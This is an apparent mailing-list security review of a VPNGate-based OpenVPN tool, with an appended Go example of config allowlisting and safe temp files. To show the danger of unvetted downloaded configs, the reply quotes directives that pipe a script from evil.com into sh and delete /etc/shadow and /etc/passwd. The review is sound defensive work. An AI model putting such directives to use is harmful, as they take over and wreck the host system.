On Mon Feb 19, 2018 at 12:44:40 +0100, Michael Meskes wrote:

> > * It relies upon the external VPNGate.net site/service. If this
> >   goes away in the lifetime of a stable Debian release users will
> >   be screwed.
>
> That is actually a good point. I wonder if using a local copy might be
> a good alternative.

If you're willing to maintain such a list, resyncing it every few days/months to reap dead-entries and add new ones then that would be good.

> > * It allows security attacks against the local system, which other
> >   users on the host could exploit via symlink attacks on
> >   /tmp/openvpnconf
>
> True, but this could be handled by using a better system to access a
> temp file.

Sure. If you changed the code to use ioutil.TempFile, or some other secure alternative that specific objection will go away.

> > 1. The tool downloads a remote URL to /tmp/openvpnconf
> >
> > 2. The file is then given as an argument to the command:
> >    sudo openvpn /tmp/openvpnconf
> >
> > 3. That generated/downloaded openvpn configuration file could
> >    be written to do anything, up to and including `rm -rf /`.
>
> Can you actually get openvpn to do this?

Yes. For example these snippets will do what you fear they will:

    script-security 2
    up curl http://evil.com/root-me.sh | sh
    up rm /etc/shadow
    down rm -f /etc/passwd

> I read this not as "insecure for the system it runs on" but "insecure
> on the connection side". This is certainly not something you should use
> to open your local network to, or to do something illegal.

As per the insecure fixed name, and the execution of commands from a remote HTTP-site (not even SSL!) I think it is insecure in all regards.

Also I guess you'll need to change the script to remove "sudo", or better yet add a restricted user with sudo's nopasswd setup for it (shudder).

Steve
--
https://www.steve.org.uk/
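
Added example, not part of the thread above and not code from the tool under discussion: a Go sketch of the two mitigations the message names, refusing a downloaded profile that carries command-running directives and replacing the fixed /tmp/openvpnconf with os.CreateTemp (the current name for ioutil.TempFile). The allowlist contents and the names checkConfig and saveConfig are assumptions of this example.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// Assumed allowlist for a plain client profile; up/down/script-security are absent.
var allowed = map[string]bool{"client": true, "dev": true, "proto": true, "remote": true,
	"nobind": true, "persist-key": true, "persist-tun": true, "cipher": true, "auth": true, "verb": true}
// checkConfig rejects any directive that is not on the allowlist.
func checkConfig(conf string) error {
	inline := "" // closing tag of the inline block we are inside, if any
	sc := bufio.NewScanner(strings.NewReader(conf))
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(sc.Text())
		switch {
		case inline != "": // inline certificate/key data, not directives
			if strings.HasPrefix(line, inline) {
				inline = ""
			}
		case line == "" || line[0] == '#' || line[0] == ';': // blank or comment
		case line == "<ca>" || line == "<cert>" || line == "<key>":
			inline = "</" + line[1:]
		default:
			if d := strings.Fields(line)[0]; !allowed[d] {
				return fmt.Errorf("line %d: directive %q not allowed", n, d)
			}
		}
	}
	return sc.Err()
}
// saveConfig validates conf, then writes it to a new randomly named file (O_EXCL, 0600).
func saveConfig(conf string) (string, error) {
	if err := checkConfig(conf); err != nil {
		return "", err
	}
	f, err := os.CreateTemp("", "openvpnconf-*")
	if err != nil {
		return "", err
	}
	defer f.Close()
	_, err = f.WriteString(conf)
	return f.Name(), err
}
func main() {
	fmt.Println(saveConfig("client\nup rm /etc/shadow\n")) // constructed hostile profile
}
```

The caller removes the returned file once openvpn has exited; the check is an allowlist so that a directive the example does not know about is refused rather than passed through.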